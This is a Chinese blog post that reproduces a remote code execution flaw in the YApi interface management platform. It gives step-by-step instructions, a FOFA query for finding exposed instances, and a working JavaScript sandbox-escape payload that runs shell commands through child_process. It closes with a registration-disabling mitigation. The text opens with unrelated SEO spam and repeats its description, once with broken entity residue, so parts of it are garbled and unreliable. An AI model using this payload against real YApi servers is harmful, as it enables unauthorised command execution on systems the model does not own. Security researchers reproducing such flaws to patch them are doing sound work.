网站开发硬件环境,东莞网站建设周期,全国招标公告公示平台,汉中网站建设公司电话跟风一波复现Yapi
漏洞描述#xff1a;
YApi接口管理平台远程代码执行0day漏洞#xff0c;攻击者可通过平台注册用户添加接口#xff0c;设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态#xff0c;强烈建议客户尽快采取缓解措施以避免受此漏洞影响
…跟风一波复现Yapi
漏洞描述
YApi接口管理平台远程代码执行0day漏洞攻击者可通过平台注册用户添加接口设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态强烈建议客户尽快采取缓解措施以避免受此漏洞影响
fofa
Fofa:appYApi漏洞复现 默认注册功能开启。 注册后创建项目 添加接口 创建接口成功 选择“高级Mock”“脚本”开启脚本 写入poc并保存
const sandbox this
const ObjectConstructor this.constructor
const FunctionConstructor ObjectConstructor.constructor
const myfun FunctionConstructor(return process)
const process myfun()
mockJson process.mainModule.require(child_process).execSync(whoami ps -ef).toString()预览 效果 Yapi作者已经停止更新。临时修复建议禁止用户注册具体配置参考原文链接 https://github.com/YMFE/yapi/issues/2099
看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!
